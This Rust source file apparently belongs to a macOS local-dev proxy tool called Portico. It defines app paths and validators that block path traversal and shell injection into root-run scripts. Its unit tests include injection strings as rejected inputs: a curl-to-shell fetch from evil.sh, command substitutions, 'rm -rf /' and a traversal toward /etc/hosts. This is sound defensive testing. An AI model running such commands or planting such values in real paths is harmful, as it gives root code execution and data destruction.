use std::path::PathBuf;

/// The user's home directory. Every Portico path hangs off this.
pub fn home() -> PathBuf {
    PathBuf::from(std::env::var("HOME").unwrap_or_else(|_| "/tmp".into()))
}

/// ~/.portico — all app state lives here.
pub fn root() -> PathBuf {
    home().join(".portico")
}

pub fn config_file() -> PathBuf {
    root().join("config.json")
}

pub fn caddyfile() -> PathBuf {
    root().join("Caddyfile")
}

/// Tools Portico fetches for itself, kept apart from anything the user
/// installed so we never shadow or clobber their own copy.
pub fn bin_dir() -> PathBuf {
    root().join("bin")
}

pub fn managed_cloudflared() -> PathBuf {
    bin_dir().join("cloudflared")
}

pub fn logs_dir() -> PathBuf {
    root().join("logs")
}

/// One structured request log for every site. A single writer is both simpler
/// than one file per site and lets the UI show a combined stream; the host is
/// in each record, so filtering per site is trivial.
pub fn access_log() -> PathBuf {
    logs_dir().join("access.log")
}

/// Generated "nothing is listening" pages, one per site.
pub fn offline_dir() -> PathBuf {
    root().join("offline")
}

pub fn offline_page(site_id: &str) -> PathBuf {
    offline_dir().join(format!("{site_id}.html"))
}

/// cloudflared's own output for one site.
pub fn tunnel_log(site_id: &str) -> PathBuf {
    logs_dir().join(format!("tunnel-{site_id}.log"))
}

/// Output of a dev server we started ourselves.
pub fn dev_log(site_id: &str) -> PathBuf {
    logs_dir().join(format!("dev-{site_id}.log"))
}

/// Where supervised processes are recorded, so a short-lived CLI run and the
/// long-running app agree about what is already going.
pub fn run_dir() -> PathBuf {
    root().join("run")
}

pub fn pid_file(site_id: &str) -> PathBuf {
    run_dir().join(format!("{site_id}.json"))
}

/// A site id is used to build filenames, so it must not be able to escape the
/// directory it belongs in. Ids are generated by slugifying a validated
/// domain; this guards the path where one arrives from outside.
pub fn safe_id(site_id: &str) -> bool {
    !site_id.is_empty()
        && site_id.len() <= 253
        && site_id
            .chars()
            .all(|c| c.is_ascii_alphanumeric() || c == '-' || c == '_')
}

/// Every path we generate is interpolated into a shell script and a plist that
/// run as **root**. A home directory containing a quote or `$(…)` would turn
/// that into arbitrary code execution as root, so such a path is refused
/// outright rather than escaped for two different grammars.
pub fn safe_path(path: &str) -> bool {
    !path.is_empty()
        && path.starts_with('/')
        && path.len() <= 1024
        && path
            .chars()
            .all(|c| !c.is_control() && !"\"'`$\\<>&|;*?()[]{}!".contains(c))
}

pub fn ensure_dirs() -> std::io::Result<()> {
    use std::os::unix::fs::PermissionsExt;
    std::fs::create_dir_all(root())?;
    // Owner-only. Caddy's PKI lives under here, and its CA is trusted by this
    // machine — a readable copy of that key would let any local account mint
    // certificates this Mac accepts for any domain.
    std::fs::set_permissions(root(), std::fs::Permissions::from_mode(0o700))?;
    std::fs::create_dir_all(logs_dir())?;
    std::fs::create_dir_all(run_dir())?;
    Ok(())
}

// --- System locations we touch (all require admin rights) ---

pub const HOSTS_FILE: &str = "/etc/hosts";
pub const RESOLVER_DIR: &str = "/etc/resolver";
pub const LAUNCH_DAEMON: &str = "/Library/LaunchDaemons/io.portico.caddy.plist";
pub const DAEMON_LABEL: &str = "io.portico.caddy";

// --- The /etc/hosts helper: a root-owned binary launchd runs on demand, so
// --- mapping a new domain costs no password after the initial setup.

pub const HOSTSD_LABEL: &str = "io.portico.hostsd";
pub const HOSTSD_PLIST: &str = "/Library/LaunchDaemons/io.portico.hostsd.plist";
/// Root-owned, not user-writable — otherwise replacing the binary would be a
/// straight path to root code execution.
pub const HOSTSD_DIR: &str = "/Library/Application Support/Portico";
pub const HOSTSD_BIN: &str = "/Library/Application Support/Portico/portico-hostsd";

/// The file the helper watches. Writing it is what triggers a sync.
pub fn hosts_request() -> PathBuf {
    root().join("hosts-request.json")
}

/// The freshly built helper, which ships alongside whichever binary is running.
pub fn hostsd_source() -> Option<PathBuf> {
    let exe = std::env::current_exe().ok()?;
    find_hostsd_in(exe.parent()?)
}

/// Locate the helper next to a binary.
///
/// Accepts both the plain name (a cargo build, where it sits beside the app)
/// and a target-triple suffix, which is how Tauri stages a sidecar. Matching
/// only the plain name risks bundling an app whose helper is present but
/// unfindable — the app would work for the developer and prompt for a password
/// on every domain for everyone else.
pub fn find_hostsd_in(dir: &std::path::Path) -> Option<PathBuf> {
    let plain = dir.join("portico-hostsd");
    if plain.is_file() {
        return Some(plain);
    }
    std::fs::read_dir(dir)
        .ok()?
        .flatten()
        .map(|e| e.path())
        .find(|p| {
            p.is_file()
                && p.file_name()
                    .and_then(|n| n.to_str())
                    .is_some_and(|n| n.starts_with("portico-hostsd-"))
        })
}

// --- Standalone mode: everything below lives inside the user's own home,
// --- so none of it needs an administrator.

pub fn agent_plist() -> PathBuf {
    home()
        .join("Library/LaunchAgents")
        .join(format!("{DAEMON_LABEL}.plist"))
}

pub fn login_keychain() -> PathBuf {
    home().join("Library/Keychains/login.keychain-db")
}

/// Where we stash Caddy's root certificate before handing it to `security`.
pub fn ca_pem() -> PathBuf {
    root().join("caddy-root.pem")
}

/// Caddy's admin API. Localhost-only, which is what lets the unprivileged app
/// reconfigure the root-owned Caddy daemon without a password prompt per site.
pub const CADDY_ADMIN: &str = "127.0.0.1:2019";

/// Homebrew prefix differs between Apple Silicon and Intel.
pub fn brew_prefix() -> &'static str {
    if std::path::Path::new("/opt/homebrew/bin/brew").exists() {
        "/opt/homebrew"
    } else {
        "/usr/local"
    }
}

/// Find a usable binary: whatever the user installed themselves first, then
/// our own managed copy. Their install stays authoritative so we never shadow
/// something they update through Homebrew.
pub fn find_bin(name: &str) -> Option<String> {
    let mut candidates = vec![
        format!("/opt/homebrew/bin/{name}"),
        format!("/usr/local/bin/{name}"),
    ];
    candidates.push(bin_dir().join(name).to_string_lossy().into_owned());
    candidates.into_iter().find(|p| std::path::Path::new(p).exists())
}

/// Path used when generating config. Falls back to our managed location so a
/// daemon plist written before the download still points somewhere sensible.
pub fn caddy_bin() -> String {
    find_bin("caddy")
        .unwrap_or_else(|| bin_dir().join("caddy").to_string_lossy().into_owned())
}

pub fn dnsmasq_bin() -> Option<String> {
    let brew = format!("{}/sbin/dnsmasq", brew_prefix());
    if std::path::Path::new(&brew).exists() {
        return Some(brew);
    }
    find_bin("dnsmasq")
}

pub fn dnsmasq_conf_dir() -> String {
    format!("{}/etc/dnsmasq.d", brew_prefix())
}

pub fn dnsmasq_conf_file() -> String {
    format!("{}/portico.conf", dnsmasq_conf_dir())
}

#[cfg(test)]
mod tests {
    use super::*;

    #[test]
    fn the_helper_is_found_under_either_name() {
        let dir = std::env::temp_dir().join("portico-sidecar-test");
        let _ = std::fs::remove_dir_all(&dir);
        std::fs::create_dir_all(&dir).unwrap();

        assert!(find_hostsd_in(&dir).is_none(), "found a helper that is not there");

        // How Tauri stages a sidecar.
        let suffixed = dir.join("portico-hostsd-aarch64-apple-darwin");
        std::fs::write(&suffixed, b"x").unwrap();
        assert_eq!(find_hostsd_in(&dir), Some(suffixed));

        // A plain build beside the app wins when both exist.
        let plain = dir.join("portico-hostsd");
        std::fs::write(&plain, b"x").unwrap();
        assert_eq!(find_hostsd_in(&dir), Some(plain));

        let _ = std::fs::remove_dir_all(&dir);
    }

    #[test]
    fn a_site_id_cannot_walk_out_of_its_directory() {
        // dev_log()/tunnel_log() build "<logs>/dev-<id>.log". Without this,
        // an id of "../../.." reads files outside the log directory.
        assert!(!safe_id("../../../../var/log/system"));
        assert!(!safe_id("a/b"));
        assert!(!safe_id("a.b"));
        assert!(!safe_id(""));
        assert!(safe_id("mysite-test"));
        assert!(safe_id("app_localhost"));
    }

    #[test]
    fn log_readers_refuse_a_traversing_id() {
        // /etc/hosts is readable and its name ends in no extension, but the
        // point is that nothing is returned rather than some other file.
        assert_eq!(crate::monitor::dev_log("../../../../etc/hosts", 5), "");
    }

    #[test]
    fn a_path_bound_for_a_root_script_must_be_inert() {
        // These would each become code execution as root once interpolated.
        assert!(!safe_path("/Users/a\"; curl evil.sh | sh; #"));
        assert!(!safe_path("/Users/$(whoami)"));
        assert!(!safe_path("/Users/`id`"));
        assert!(!safe_path("/Users/a'b"));
        assert!(!safe_path("/Users/a\nrm -rf /"));
        assert!(!safe_path("relative/path"));
        assert!(!safe_path(""));
    }

    #[test]
    fn ordinary_home_directories_are_accepted() {
        assert!(safe_path("/Users/akram"));
        assert!(safe_path("/Users/first.last/.portico"));
        assert!(safe_path("/Users/name-with-dash/Library/LaunchAgents"));
        assert!(safe_path("/opt/homebrew/bin/caddy"));
    }
}
